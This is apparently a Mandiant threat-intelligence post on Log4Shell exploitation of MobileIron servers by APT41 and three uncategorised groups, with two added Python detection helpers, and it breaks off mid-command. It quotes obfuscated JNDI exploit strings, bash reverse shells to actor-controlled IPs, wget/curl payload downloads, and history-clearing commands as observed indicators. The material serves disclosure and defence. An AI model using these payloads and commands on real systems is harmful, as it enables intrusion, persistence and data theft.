Forged in Fire: A Survey of MobileIron Log4Shell Exploitation
Mandiant
Written by: Geoff Ackerman, Tufail Ahmed, James Maclachlan, Dallin Warne, John Wolfram, Brandon Wilbur
On December 10, 2021, the Apache Software Foundation disclosed CVE-2021-44228, aka “Log4Shell”, a critical vulnerability in Apache’s Log4j version 2.14.1 and earlier that affects a large number of products that utilize this logging library.
Through our Consulting and Managed Defense clients, Mandiant observed four unique applications targeted and exploited using CVE-2021-44228. One product that caught our attention in the immediate aftermath of this CVE’s release was MobileIron Core, an on-premises mobile device management solution owned by Ivanti. Ivanti immediately responded to the vulnerability and proactively informed customers using the impacted products, recommending that they apply the tested mitigations within 24 hours. Proof-of-concept (PoC) code quickly became available to exploit the vulnerability in unpatched MobileIron systems and can be easily modified to target any organization using the product. As a result, we observed a few notable adversaries jump at the opportunity.
In this blog post, we will discuss the exploitation of MobileIron servers by four unique adversaries, providing insight into each group’s operations and capabilities. While the initial exploitation of a vulnerable MobileIron server appeared the same across intrusions, our methodical clustering and delineation of post-exploitation actions unveiled some familiar adversaries and unmasked some new players that made quick use of this newly published exploit.
CVE-2021-44228 Big Picture
First let’s take a step back and review Log4j targeting since CVE-2021-44228's release. Beginning the day of that initial disclosure, Mandiant observed mass scanning and exploitation attempts across a large variety of our customers. Financially motivated actors immediately jumped at the opportunity to deploy cryptominers such as XMRIG. In mass exploitation scenarios, like Log4Shell, we have found that cryptominers often drop first. While not immediate, Mandiant later observed ransomware actors exploit CVE-2021-44228 to gain their initial foothold into target environments. Groups that are widely suspected of being related to foreign intelligence entities, such as APT41, wasted no time in exploiting MobileIron servers as they were observed within a day of the announcement of the vulnerability.
The Actors
Since its initial disclosure, we have observed 22 distinct clusters of activity involved in the exploitation of CVE-2021-44228. These adversaries used a range of tools and techniques in support of varying mission objectives during the post-exploitation phase of their intrusions. Table 1 shows 12 of those clusters that have conducted Log4Shell-based campaigns against multiple organizations, sorted by their assessed goals.
Through all the noise of Log4j scanning, cryptominers, security testing, and intrusion activity that occurred in December 2021, the following four threat groups exploited MobileIron to conduct the most significant intrusions observed by Mandiant.
Mandiant uses the label “UNC” group—or “uncategorized” group—to refer to a cluster of intrusion activity that includes observable artifacts such as adversary infrastructure, tools, and tradecraft that we are not yet ready to give a formal classification to, like APT or FIN (learn more about how Mandiant tracks uncategorized threat actors).
Further details surrounding each of the aforementioned groups are provided in Table 3:
Threat Group Details
APT41 Mandiant Advantage Profile
APT41 is a Chinese state-sponsored espionage group that also conducts financially motivated activity for personal gain. The group has been active since at least 2012 and has conducted espionage operations against a wide number of industries in the public and private sectors. The group has executed multiple supply chain compromises that allowed them to gain access to software companies and inject malicious code into legitimate files before distributing updates. APT41 also carried out operations against the video game industry for financially motivated intrusions as well as to steal source code and digital certificates.
Most recently, APT41 has spent considerable time and resources to conduct a long-term campaign against U.S. state government entities using web exploits to target public-facing servers. APT41’s participation in Log4Shell exploitation is a logical continuation of their past year of activity. For more details on APT41 and their persistent campaign targeting U.S. state government computer networks, see our recent blog post: “Does This Look Infected?”: A Summary of APT41 Targeting U.S. State Governments
UNC961 Mandiant Advantage Profile
Mandiant has tracked UNC961 since January 2018, with confirmed activity dating back to November 2016. UNC961 is a financially motivated group that has historically targeted organizations in the retail and business service sectors in North America. Starting in mid-2020, UNC961 expanded its targets to health care, energy, financial transactions, and high-tech organizations in North America, Northern Europe, and Western Asia. In all known activity, UNC961 has utilized web exploits to initiate their intrusions, having targeted Atlassian Confluence, ForgeRock AM, and Oracle Web Logic servers.
UNC3500 Mandiant Advantage Profile
Mandiant clustered UNC3500 in the immediate aftermath of Log4Shell’s public release. Mandiant suspects UNC3500 has a China nexus and has been observed targeting entities in the education and telecommunications sectors. We confirmed overlaps between UNC3500’s Log4Shell activity and a set of suspected Chinese espionage activity that Mandiant clustered in May 2021. These overlaps included the use of SoftEther VPN to maintain access to a system, specific SoftEther configuration settings, related infrastructure, and targeting overlaps.
Mandiant clustered UNC3535 in the aftermath of Log4Shell’s public release. While we have not gathered enough information on UNC3535 to assess their primary motivation, UNC3535 has exfiltrated sensitive data from organizations in the transportation sector.
MobileIron Impact
In this section we walk through the MobileIron-based intrusions conducted by each of the aforementioned adversaries.
APT41
In one of the most notable intrusions, APT41 made quick use of this public exploit to target organizations, which included multiple U.S. state government entities. APT41 used CVE-2021-44228 to target at least four organizations: a telecom company based in the APJ region that is a frequent target of Chinese espionage operations, one US-based financial organization, and two state-level government agencies in the U.S.
APT41 leveraged CVE-2021-44228 against vulnerable MobileIron servers to launch reverse shell payloads back to their controlled server. Using this access, APT41 executed commands on the system under the context of the user account tomcat. One example reverse shell payload is presented in Figure 1.
TomcatBypass/Command/Base64/YmFzaCAtaT4mIC9kZXYvdGNwLzEwMy4yNDIuMTMzLjQ4LzgwODUgMD4mMQ==
The base64-encoded string decodes to the following reverse shell payload (Figure 2).
bash -i>& /dev/tcp/103.242.133[.]48/8085 0>&1
Mandiant also observed payloads consistent with verifying network connectivity to a threat actor-controlled host (Figure 3).
ping -c 1 libxqagv.ns.dns3[.]cf
nslookup libxqagv.ns.dns3[.]cf
Approximately one hour later, Mandiant identified further exploitation attempts using sub-domains of eu[.]org to test outbound network connectivity (Figure 4).
ldap:/198.13.40[.]130:1389/Basic/Dnslog/335b5282.dns.1433.eu[.]org
ldap://198.13.40[.]130:1389/Deserialization/URLDNS/335b5282.dns.1433.eu[.]org
After confirming outbound connectivity, APT41 used CVE-2021-44228 to execute a new reverse shell payload (Figure 5).
"s${jndi:ldap://198.13.40[.]130:1389/Deserialization/CommonsBeanutils1/ReverseShell/198.13.40[.]130/2222}"
"s${jndi:ldap://198.13.40[.]130:1389/Basic/ReverseShell/198.13.40[.]130/2222}"
Once APT41 established the reverse shell, they leveraged wget to download and stage their payload on the MobileIron server (Figure 6).
wget http://103.224.80[.]44:8080/kernel
Mandiant determined the kernel file was an ELF variant of KEYPLUG, tracked now as KEYPLUG.LINUX. The threat actor configured the sample to connect to the domain microsoftfile[.]com for command and control. At the time of the activity, the domain resolved to the IP address 103.224.80[.]44. APT41 also modified the permissions of the binary to give full read/write/execute permissions to all users (Figure 7).
chmod 777 kernel
Finally, APT41 took a few steps to attempt to hide their activity. They renamed the KEYPLUG.LINUX binary to .kernel so that the leading dot hides it from a default directory listing, then leveraged the nohup utility to ensure the process remains running and ignores hangups. APT41 also leveraged the & operator to execute the binary as a background process (Figure 8).
nohup ./.kernel &
Mandiant Managed Defense’s swift detection and containment of this intrusion once again proved its worth against even the most advanced and prolific espionage actors. However, as noted in our recently released blog post on APT41’s latest campaigns, the group has remained undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020 and continues to operate at an ever-increasing tempo with a focus on vulnerable U.S. state and local government networks. Mandiant expects the group to continue to evolve and develop their own attack vectors while integrating existing capabilities into their toolkit.
UNC961
UNC961 is a suspected financially motivated threat group that Mandiant has tracked since 2018. They seized the opportunity to exploit CVE-2021-44228 by targeting organizations with publicly accessible MobileIron servers. UNC961 is notable for their seemingly exclusive use of exploits against web applications for initial access.
At one target, Mandiant observed UNC961 use their CVE-2021-44228 payload to establish a reverse shell. This payload was also crafted to unset the HISTFILE environment variable to thwart forensic analysis by preventing the command line history from being written to disk.
{"connectedCloudName":"","logType":"userAction","version":1,"loggedAt":1639501069210,"actionAt":1639501069210,"device":null,"actor":null,"configuration":null,"updatedBlob":null,"certificateDetails":null,"message":null,"spaceName":null,"spacePath":null,"actionType":"USER_PORTAL_SIGN_IN","requestedAt":1639501069210,"completedAt":1639501069210,"reason":"Sign In Failed","status":"Failed","objectId":null,"objectType":null,"objectName":null,"subjectId":null,"subjectType":"User Portal","subjectName":"User Portal - 10.240.191.26","subjectOwnerName":null,"requesterName":"${jnd${AvmMzY:qv:FCGWU:XTWCd:-i}:${jnd${CSQNpd:dM:-i}${ARhXC:-:}ldap${rt:NeMA:bbLAHm:Cku:MMHDE:-:}//107.181.187.184:389/TomcatBypass/Command/Base64/dW5zZXQgSElTVEZJTEU7IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTA3LjE4MS4xODcuMTg0LzQyNDIgMD4mMQ==}","updateRequestId":null,"userInRole":null,"parentId":null,"cookie":null}
Figure 10 shows the deobfuscated exploit string.
${jndi:ldap://107.181.187.184:389/TomcatBypass/Command/Base64/dW5zZXQgSElTVEZJTEU7IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTA3LjE4MS4xODcuMTg0LzQyNDIgMD4mMQ==}
The decoded command, shown in Figure 11, removed command-line logging and executed a reverse shell payload.
unset HISTFILE; bash -i >& /dev/tcp/107.181.187.184/4242 0>&1
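As an added example (not code from the original post), the following Python triage helper collapses the `${...:-x}` default-value lookups used to obfuscate the exploit string above, extracts the JNDI URL and the Base64 command, and tags the reverse-shell and HISTFILE indicators; it also handles the bare TomcatBypass/Command/Base64 form shown for APT41 in Figure 1. The audit record it parses is constructed for the demo, carrying the obfuscated requesterName from the log excerpt.

```python
import base64
import json
import re

# Log4j "${name:-default}" lookups: the obfuscated requesterName above nests
# these so that each one evaluates to a single character ("i" or ":").
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_URL = re.compile(r'jndi:((?:ldaps?|rmi|dns)://[^}\s"]+)')
_B64_SEGMENT = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")

# Constructed audit record for the demo; requesterName is the obfuscated
# lookup string from the log excerpt above.
SAMPLE_RECORD = json.dumps({"actionType": "USER_PORTAL_SIGN_IN", "status": "Failed",
    "requesterName": "${jnd${AvmMzY:qv:FCGWU:XTWCd:-i}:${jnd${CSQNpd:dM:-i}"
                     "${ARhXC:-:}ldap${rt:NeMA:bbLAHm:Cku:MMHDE:-:}//107.181.187.184"
                     ":389/TomcatBypass/Command/Base64/dW5zZXQgSElTVEZJTEU7IGJhc2gg"
                     "LWkgPiYgL2Rldi90Y3AvMTA3LjE4MS4xODcuMTg0LzQyNDIgMD4mMQ==}"})

def deobfuscate_lookups(s: str) -> str:
    """Replace every ${...:-x} with its default x until nothing changes."""
    prev = None
    while prev != s:
        prev, s = s, _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
    return s

def decode_base64_command(s: str):
    """Return the command carried in a .../Base64/<b64> path, or None."""
    m = _B64_SEGMENT.search(s)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace") if m else None
    except ValueError:  # binascii.Error (bad padding/alphabet) subclasses ValueError
        return None

def triage(text: str) -> dict:
    """Deobfuscate, pull out the JNDI URL and decoded command, and tag TTPs."""
    clean = deobfuscate_lookups(text)
    url = _JNDI_URL.search(clean)
    cmd = decode_base64_command(clean) or ""
    tags = []
    if "/dev/tcp/" in cmd:
        tags.append("reverse_shell")   # bash /dev/tcp reverse shell
    if "unset HISTFILE" in cmd or "history -c" in cmd:
        tags.append("anti_forensics")  # shell history suppression
    return {"jndi_url": url.group(1) if url else None, "command": cmd, "tags": tags}

def triage_audit_record(line: str) -> dict:
    """Check every string field of a MobileIron JSON audit record for lookups."""
    for field, value in json.loads(line).items():
        if isinstance(value, str) and "${" in value:
            return {"field": field, **triage(value)}
    return {"field": None, "jndi_url": None, "command": "", "tags": []}
```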
UNC961 commonly employs this anti-forensic technique in their Linux-based intrusions, either as a component of an exploit payload such as here with Log4Shell, or during the hands-on-keyboard post-exploitation phase. Following their initial foothold, they performed host-based reconnaissance, and the following day deployed their HOLEPUNCH tunneler. HOLEPUNCH is a Windows and UNIX source-compatible utility that uses SOCKS5 style commands to multiplex connections back to its command and control (C2) server.
It is worth noting that, in addition to targeting MobileIron servers, UNC961 also exploited a VMware Horizon server belonging to a separate victim during their Log4Shell campaign. Following the Horizon server’s exploitation, UNC961 deployed two previously unobserved backdoors: HOLEDOOR and DARKDOOR. HOLEDOOR is written in C, whereas DARKDOOR is written in Go. UNC961 used these backdoors to conduct reconnaissance in the victim environment and steal credentials for users who had previously logged in to the VMware Horizon server. Additionally, UNC961 exported the contents of the SAM, SECURITY, and SYSTEM registry hives using the built-in Windows tool reg.exe. UNC961 then exfiltrated the exported registry data to their infrastructure using the PSCP utility.
UNC3500
One day after the initial Apache announcement, UNC3500 jumped at the opportunity to target an educational institution in North America. Having successfully weaponized the Log4Shell exploit, UNC3500 launched a reverse shell on a MobileIron server. After performing some initial host reconnaissance, the adversary achieved persistence through a relatively unique method. Using the built-in curl command, UNC3500 downloaded three files, modified permissions of one, and launched another as a new process (Figure 12).
curl hxxp://35.189.145[.]119/hamcore.se2 > /mi/pki/mics/log/hamcore.se2
curl hxxp://35.189.145[.]119/https > /mi/pki/mics/log/https
curl hxxp://35.189.145[.]119/vpn_bridge.config > /mi/pki/mics/log/vpn_bridge.config
chmod a+x /mi/pki/mics/log/https
/mi/pki/mics/log/https start
The files https (MD5: 00352d167c44272dba415c36867a8125) and hamcore.se2 (MD5: 9fb1191ba0064d317a883677ce568023) are components of SoftEther’s VPN server bridge, PacketiX. The PacketiX VPN Bridge creates a layer 2 connection between a physical network adapter on a local system and a remote SoftEther VPN server. It requires an accompanying library file hamcore.se2 and a configuration file vpn_bridge.config. By deploying this package, UNC3500 established persistence on the compromised MobileIron server.
UNC3500 appeared to have some difficulty initially establishing their VPN. They downloaded their vpn_bridge.config file not once but four times, each with minor changes. Table 4 shows the three uniquely configured C2 servers from these files.
UNC3500 had to troubleshoot their connection issues by examining VPN log files and running ping, route, and curl commands (Figure 13).
curl http://35.189.145.119/vpn_bridge.config > /mi/pki/mics/log/vpn_bridge.config
/mi/pki/mics/log/https start
ls /mi/pki/mics/log/
ls /mi/pki/mics/log/server_log
cat /mi/pki/mics/log/server_log/vpn_20211210.log
/mi/pki/mics/log/https stop
ping -c 2 8.8.8[.]8
route
curl http://45.76.98[.]184:33221
curl http://34.92.40[.]189:33221
curl http://34.92.40[.]189:443
curl http://34.92.40[.]189:443
ls
UNC3500 used the final configuration file to establish a VPN connection with a SoftEther server hosted on 45.76.98[.]184 over port 443 using a unique certificate and key combination. UNC3500 proceeded to hide their tracks by clearing the bash history using the command history -c.
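As an added example, not from the original post, here is a small Python hunt over executed command lines that encodes the staging and anti-forensic behaviour described for APT41 (Figures 6 to 8) and UNC3500 (Figures 12 and 13) as rules and reports the download, chmod, execute sequence as one chain. The command sample is constructed; the mv rename step is assumed, since the post states only that the binary was renamed to .kernel.

```python
import re

# Constructed sample of commands executed as the tomcat user, patterned on
# the post-exploitation activity in this post. The "mv" step is assumed: the
# post says only that the binary was renamed to .kernel.
SAMPLE_COMMANDS = [
    "wget http://103.224.80.44:8080/kernel",
    "chmod 777 kernel",
    "mv kernel .kernel",
    "nohup ./.kernel &",
    "curl http://35.189.145.119/hamcore.se2 > /mi/pki/mics/log/hamcore.se2",
    "chmod a+x /mi/pki/mics/log/https",
    "/mi/pki/mics/log/https start",
    "history -c",
    "ls /mi/pki/mics/log/",
]

# Each rule names one technique observed in the intrusions above.
RULES = [
    ("download_tool", re.compile(r"^(wget|curl)\b")),
    ("world_writable_exec", re.compile(r"^chmod\s+(777|a\+x|\+x)\b")),
    ("hidden_binary_exec", re.compile(r"(^|\s)\./\.[^\s/]+")),
    ("nohup_background", re.compile(r"^nohup\b.*&\s*$")),
    ("history_tampering", re.compile(r"history\s+-c\b|unset\s+HISTFILE\b")),
    ("softether_bridge", re.compile(r"hamcore\.se2|vpn_bridge\.config|/https\s+(start|stop)\b")),
    ("reverse_shell", re.compile(r"/dev/tcp/")),
]
EXEC_RULES = {"nohup_background", "hidden_binary_exec", "softether_bridge"}

def match_rules(cmd: str) -> list:
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]

def hunt(commands) -> dict:
    """Flag rule hits and the download -> chmod -> execute staging sequence."""
    hits, chains, stage = [], [], 0
    for i, cmd in enumerate(commands):
        names = match_rules(cmd)
        if names:
            hits.append((i, cmd, names))
        if "download_tool" in names:
            stage = 1                     # a file was pulled from outside...
        elif stage == 1 and "world_writable_exec" in names:
            stage = 2                     # ...then made executable...
        elif stage == 2 and EXEC_RULES & set(names):
            chains.append(i)              # ...then launched: report the chain
            stage = 0
    return {"hits": hits, "staging_chains": chains}
```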
Analysis of these config files identified overlaps with a prior intrusion where this group targeted an organization in the telecommunications vertical. During these prior on-host intrusions, Mandiant observed UNC3500 engage in reconnaissance activities primarily using Windows built-in commands or PSEXEC, perform credential harvesting using MODKATZ, and deploy BEHINDER and CHOPPER web shells.
UNC3535
Finally, Mandiant clustered another unique set of MobileIron exploitation activity as UNC3535. Mandiant observed UNC3535 use CVE-2021-44228 to deploy a reverse shell and use their access to harvest and exfiltrate sensitive MobileIron data.
As is typical of other Log4Shell exploits, the adversary used a base64-encoded string (Figure 14).
${jndi:ldap://187.109.15[.]2:9126/TomcatBypass/Command/Base64/YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTg3LjEwOS4xNS4yLzQ0MyAwPiYx}
The base64-encoded string in Figure 14 decodes to Figure 15.
bash -i >& /dev/tcp/187.109.15[.]2/443 0>